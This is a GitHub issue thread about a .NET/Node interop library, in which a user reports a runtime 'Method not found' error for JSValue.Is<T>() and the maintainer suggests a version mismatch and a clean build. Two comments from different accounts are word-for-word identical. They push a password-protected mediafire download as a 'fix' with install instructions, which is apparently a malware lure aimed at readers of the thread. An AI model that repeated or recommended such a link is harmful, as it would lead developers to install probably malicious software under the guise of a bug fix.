### ISSUE TITLE
Method not found 'Boolean Microsoft.JavaScript.NodeApi.JSValue.Is()'

### ISSUE THREAD

**Issue by moriyalb** [microsoft/node-api-dotnet#364] opened 2024-08-27 03:38 UTC
`//JSValue.cs
public bool Is<T>() where T : struct, IJSValue<T>
{
    return T.CanCreateFrom(this);
}`

`//MyCode
//JSValue _in;
if (!_in.Is<JSMap>()) {
    Jex.Error("implicit map value failed. invalid value ");
    return _out;
}`

Compile is success. But while running, got this error:

<rejected> Error: Method not found: 'Boolean Microsoft.JavaScript.NodeApi.JSValue.Is()'.
at jj.Jex.Runtime.ProxyTypes.Tb5b61cd4_W.op_Implicit(JSValue _in)

How could this happen?

**Comment by amir1387aht** [comment] 2024-08-27 03:40
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment] 2024-08-27 03:42
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jasongin** [comment] 2024-08-28 23:36
I'm not sure what's going on there. Is it possible it's using an older version of the assembly at runtime than the one used to build? The `JSValue.Is<>()` method was [added fairly recently](https://github.com/microsoft/node-api-dotnet/pull/196) so slightly older version wouldn't have it.

**Comment by jasongin** [comment] 2024-09-04 16:54
Closing because I can't reproduce this. Try doing a clean build, and check the version of the `Microsoft.JavaScript.NodeApi` assembly in your output directory.

**Closed by jasongin** 2024-09-04 16:54 UTC
